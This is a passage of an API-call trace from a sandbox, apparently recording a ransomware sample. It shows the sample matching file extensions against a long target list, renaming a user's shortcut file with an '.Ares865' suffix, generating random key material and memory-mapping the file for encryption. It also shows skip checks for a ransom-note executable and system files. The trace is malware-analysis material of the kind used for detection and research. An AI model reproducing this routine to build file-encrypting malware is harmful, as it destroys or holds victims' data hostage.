(lpString="0jIgSp-.ots.lnk") returned 15 [0092.895] lstrlenW (lpString="bak") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.895] lstrlenW (lpString="ba_") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.895] lstrlenW (lpString="dbb") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.895] lstrlenW (lpString="vmdk") returned 4 [0092.895] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.895] lstrlenW (lpString="rar") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.895] lstrlenW (lpString="zip") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.895] lstrlenW (lpString="tgz") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.895] lstrlenW (lpString="vbox") returned 4 [0092.895] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.895] lstrlenW (lpString="vdi") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.895] lstrlenW (lpString="vhd") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.895] lstrlenW (lpString="vhdx") returned 4 [0092.895] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.895] lstrlenW (lpString="avhd") returned 4 [0092.895] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.895] lstrlenW (lpString="db") returned 2 [0092.895] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.895] lstrlenW (lpString="db2") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.895] lstrlenW (lpString="db3") returned 3 [0092.895] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.896] lstrlenW (lpString="dbf") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.896] lstrlenW (lpString="mdf") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.896] lstrlenW (lpString="mdb") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.896] lstrlenW (lpString="sql") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.896] lstrlenW (lpString="sqlite") returned 6 [0092.896] lstrcmpiW (lpString1="ts.lnk", lpString2="sqlite") returned 1 [0092.896] lstrlenW (lpString="sqlite3") returned 7 [0092.896] lstrcmpiW (lpString1="ots.lnk", lpString2="sqlite3") returned -1 [0092.896] lstrlenW (lpString="sqlitedb") returned 8 [0092.896] lstrcmpiW (lpString1=".ots.lnk", lpString2="sqlitedb") returned -1 [0092.896] lstrlenW (lpString="xml") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.896] lstrlenW (lpString="$er") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.896] lstrlenW (lpString="4dd") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.896] lstrlenW (lpString="4dl") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.896] lstrlenW (lpString="^^^") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.896] lstrlenW (lpString="abs") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.896] lstrlenW (lpString="abx") returned 3 [0092.896] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.896] lstrlenW (lpString="accdb") returned 5 [0092.896] lstrcmpiW (lpString1="s.lnk", lpString2="accdb") returned 1 [0092.896] lstrlenW (lpString="accdc") returned 5 [0092.896] lstrcmpiW (lpString1="s.lnk", lpString2="accdc") returned 1 [0092.896] lstrlenW (lpString="accde") returned 5 [0092.896] lstrcmpiW (lpString1="s.lnk", lpString2="accde") returned 1 [0092.896] lstrlenW (lpString="accdr") returned 5 [0092.896] lstrcmpiW (lpString1="s.lnk", lpString2="accdr") returned 1 [0092.896] lstrlenW (lpString="accdt") returned 5 [0092.897] lstrcmpiW (lpString1="s.lnk", lpString2="accdt") returned 1 [0092.897] lstrlenW (lpString="accdw") returned 5 [0092.897] lstrcmpiW (lpString1="s.lnk", lpString2="accdw") returned 1 [0092.897] lstrlenW (lpString="accft") returned 5 [0092.897] lstrcmpiW (lpString1="s.lnk", lpString2="accft") returned 1 [0092.897] lstrlenW (lpString="adb") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.897] lstrlenW (lpString="adb") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.897] lstrlenW (lpString="ade") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.897] lstrlenW (lpString="adf") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.897] lstrlenW (lpString="adn") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.897] lstrlenW (lpString="adp") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.897] lstrlenW (lpString="alf") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.897] lstrlenW (lpString="ask") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.897] lstrlenW (lpString="btr") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.897] lstrlenW (lpString="cat") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.897] lstrlenW (lpString="cdb") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.897] lstrlenW (lpString="ckp") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.897] lstrlenW (lpString="cma") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.897] lstrlenW (lpString="cpd") returned 3 [0092.897] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.897] lstrlenW (lpString="dacpac") returned 6 [0092.897] lstrcmpiW (lpString1="ts.lnk", lpString2="dacpac") returned 1 [0092.897] lstrlenW (lpString="dad") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.898] lstrlenW (lpString="dadiagrams") returned 10 [0092.898] lstrcmpiW (lpString1="p-.ots.lnk", lpString2="dadiagrams") returned 1 [0092.898] lstrlenW (lpString="daschema") returned 8 [0092.898] lstrcmpiW (lpString1=".ots.lnk", lpString2="daschema") returned -1 [0092.898] lstrlenW (lpString="db-journal") returned 10 [0092.898] lstrcmpiW (lpString1="p-.ots.lnk", lpString2="db-journal") returned 1 [0092.898] lstrlenW (lpString="db-shm") returned 6 [0092.898] lstrcmpiW (lpString1="ts.lnk", lpString2="db-shm") returned 1 [0092.898] lstrlenW (lpString="db-wal") returned 6 [0092.898] lstrcmpiW (lpString1="ts.lnk", lpString2="db-wal") returned 1 [0092.898] lstrlenW (lpString="dbc") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.898] lstrlenW (lpString="dbs") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.898] lstrlenW (lpString="dbt") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.898] lstrlenW (lpString="dbv") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.898] lstrlenW (lpString="dbx") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.898] lstrlenW (lpString="dcb") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.898] lstrlenW (lpString="dct") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.898] lstrlenW (lpString="dcx") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0092.898] lstrlenW (lpString="ddl") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0092.898] lstrlenW (lpString="dlis") returned 4 [0092.898] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0092.898] lstrlenW (lpString="dp1") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0092.898] lstrlenW (lpString="dqy") returned 3 [0092.898] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0092.898] lstrlenW (lpString="dsk") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0092.899] lstrlenW (lpString="dsn") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0092.899] lstrlenW (lpString="dtsx") returned 4 [0092.899] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0092.899] lstrlenW (lpString="dxl") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0092.899] lstrlenW (lpString="eco") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0092.899] lstrlenW (lpString="ecx") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0092.899] lstrlenW (lpString="edb") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0092.899] lstrlenW (lpString="epim") returned 4 [0092.899] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0092.899] lstrlenW (lpString="fcd") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0092.899] lstrlenW (lpString="fdb") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0092.899] lstrlenW (lpString="fic") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0092.899] lstrlenW (lpString="flexolibrary") returned 12 [0092.899] lstrcmpiW (lpString1="gSp-.ots.lnk", lpString2="flexolibrary") returned 1 [0092.899] lstrlenW (lpString="fm5") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0092.899] lstrlenW (lpString="fmp") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0092.899] lstrlenW (lpString="fmp12") returned 5 [0092.899] lstrcmpiW (lpString1="s.lnk", lpString2="fmp12") returned 1 [0092.899] lstrlenW (lpString="fmpsl") returned 5 [0092.899] lstrcmpiW (lpString1="s.lnk", lpString2="fmpsl") returned 1 [0092.899] lstrlenW (lpString="fol") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0092.899] lstrlenW (lpString="fp3") returned 3 [0092.899] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0092.899] lstrlenW (lpString="fp4") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0092.900] lstrlenW (lpString="fp5") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0092.900] lstrlenW (lpString="fp7") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0092.900] lstrlenW (lpString="fpt") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0092.900] lstrlenW (lpString="frm") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0092.900] lstrlenW (lpString="gdb") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.900] lstrlenW (lpString="gdb") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0092.900] lstrlenW (lpString="grdb") returned 4 [0092.900] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0092.900] lstrlenW (lpString="gwi") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0092.900] lstrlenW (lpString="hdb") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0092.900] lstrlenW (lpString="his") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0092.900] lstrlenW (lpString="ib") returned 2 [0092.900] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0092.900] lstrlenW (lpString="idb") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0092.900] lstrlenW (lpString="ihx") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0092.900] lstrlenW (lpString="itdb") returned 4 [0092.900] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0092.900] lstrlenW (lpString="itw") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0092.900] lstrlenW (lpString="jet") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0092.900] lstrlenW (lpString="jtx") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0092.900] lstrlenW (lpString="kdb") returned 3 [0092.900] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0092.901] lstrlenW (lpString="kexi") returned 4 [0092.901] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0092.901] lstrlenW (lpString="kexic") returned 5 [0092.901] lstrcmpiW (lpString1="s.lnk", lpString2="kexic") returned 1 [0092.901] lstrlenW (lpString="kexis") returned 5 [0092.901] lstrcmpiW (lpString1="s.lnk", lpString2="kexis") returned 1 [0092.901] lstrlenW (lpString="lgc") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0092.901] lstrlenW (lpString="lwx") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0092.901] lstrlenW (lpString="maf") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0092.901] lstrlenW (lpString="maq") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0092.901] lstrlenW (lpString="mar") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0092.901] lstrlenW (lpString="marshal") returned 7 [0092.901] lstrcmpiW (lpString1="ots.lnk", lpString2="marshal") returned 1 [0092.901] lstrlenW (lpString="mas") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0092.901] lstrlenW (lpString="mav") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0092.901] lstrlenW (lpString="maw") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.901] lstrlenW (lpString="mdbhtml") returned 7 [0092.901] lstrcmpiW (lpString1="ots.lnk", lpString2="mdbhtml") returned 1 [0092.901] lstrlenW (lpString="mdn") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.901] lstrlenW (lpString="mdt") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.901] lstrlenW (lpString="mfd") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.901] lstrlenW (lpString="mpd") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.901] lstrlenW (lpString="mrg") returned 3 [0092.901] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.901] lstrlenW (lpString="mud") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.902] lstrlenW (lpString="mwb") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.902] lstrlenW (lpString="myd") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.902] lstrlenW (lpString="ndf") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.902] lstrlenW (lpString="nnt") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.902] lstrlenW (lpString="nrmlib") returned 6 [0092.902] lstrcmpiW (lpString1="ts.lnk", lpString2="nrmlib") returned 1 [0092.902] lstrlenW (lpString="ns2") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.902] lstrlenW (lpString="ns3") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.902] lstrlenW (lpString="ns4") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.902] lstrlenW (lpString="nsf") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.902] lstrlenW (lpString="nv") returned 2 [0092.902] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.902] lstrlenW (lpString="nv2") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.902] lstrlenW (lpString="nwdb") returned 4 [0092.902] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.902] lstrlenW (lpString="nyf") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.902] lstrlenW (lpString="odb") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.902] lstrlenW (lpString="odb") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.902] lstrlenW (lpString="oqy") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.902] lstrlenW (lpString="ora") returned 3 [0092.902] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.902] lstrlenW (lpString="orx") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.903] lstrlenW (lpString="owc") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.903] lstrlenW (lpString="p96") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.903] lstrlenW (lpString="p97") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.903] lstrlenW (lpString="pan") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.903] lstrlenW (lpString="pdb") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.903] lstrlenW (lpString="pdm") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.903] lstrlenW (lpString="pnz") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.903] lstrlenW (lpString="qry") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.903] lstrlenW (lpString="qvd") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.903] lstrlenW (lpString="rbf") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.903] lstrlenW (lpString="rctd") returned 4 [0092.903] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.903] lstrlenW (lpString="rod") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.903] lstrlenW (lpString="rodx") returned 4 [0092.903] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.903] lstrlenW (lpString="rpd") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.903] lstrlenW (lpString="rsd") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.903] lstrlenW (lpString="sas7bdat") returned 8 [0092.903] lstrcmpiW (lpString1=".ots.lnk", lpString2="sas7bdat") returned -1 [0092.903] lstrlenW (lpString="sbf") returned 3 [0092.903] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.903] lstrlenW (lpString="scx") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.904] lstrlenW (lpString="sdb") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.904] lstrlenW (lpString="sdc") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.904] lstrlenW (lpString="sdf") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.904] lstrlenW (lpString="sis") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.904] lstrlenW (lpString="spq") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.904] lstrlenW (lpString="te") returned 2 [0092.904] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.904] lstrlenW (lpString="teacher") returned 7 [0092.904] lstrcmpiW (lpString1="ots.lnk", lpString2="teacher") returned -1 [0092.904] lstrlenW (lpString="tmd") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.904] lstrlenW (lpString="tps") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.904] lstrlenW (lpString="trc") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.904] lstrlenW (lpString="trc") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.904] lstrlenW (lpString="trm") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.904] lstrlenW (lpString="udb") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.904] lstrlenW (lpString="udl") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.904] lstrlenW (lpString="usr") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.904] lstrlenW (lpString="v12") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.904] lstrlenW (lpString="vis") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.904] lstrlenW (lpString="vpd") returned 3 [0092.904] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.905] lstrlenW (lpString="vvv") returned 3 [0092.905] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.905] lstrlenW (lpString="wdb") returned 3 [0092.905] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.905] lstrlenW (lpString="wmdb") returned 4 [0092.905] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.905] lstrlenW (lpString="wrk") returned 3 [0092.905] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.905] lstrlenW (lpString="xdb") returned 3 [0092.905] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.905] lstrlenW (lpString="xld") returned 3 [0092.905] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.905] lstrlenW (lpString="xmlff") returned 5 [0092.905] lstrcmpiW (lpString1="s.lnk", lpString2="xmlff") returned -1 [0092.905] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0jIgSp-.ots.lnk.Ares865") returned 60 [0092.905] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0jIgSp-.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0jigsp-.ots.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0jIgSp-.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0jigsp-.ots.lnk.ares865"), dwFlags=0x1) returned 1 [0092.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\0jIgSp-.ots.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\recent\\0jigsp-.ots.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.906] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3663) returned 1 [0092.906] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.907] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.907] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.907] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.907] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.908] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1150, lpName=0x0) returned 0x15c [0092.908] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1150) returned 0x190000 [0092.909] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.909] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.909] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.910] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.910] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.910] CloseHandle (hObject=0x15c) returned 1 [0092.910] CloseHandle (hObject=0x118) returned 1 [0092.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.911] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.911] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39d6c1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x3db03b00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x3db03b00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1872, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0nc7 RNZKx5.lnk", cAlternateFileName="0NC7RN~1.LNK")) returned 1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="aoldtz.exe") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2=".") returned 1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="..") returned 1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="windows") returned -1 [0092.911] lstrcmpiW (lpString1="0nc7 RNZKx5.lnk", lpString2="bootmgr") returned -1 [0092.911] lstrcmpiW 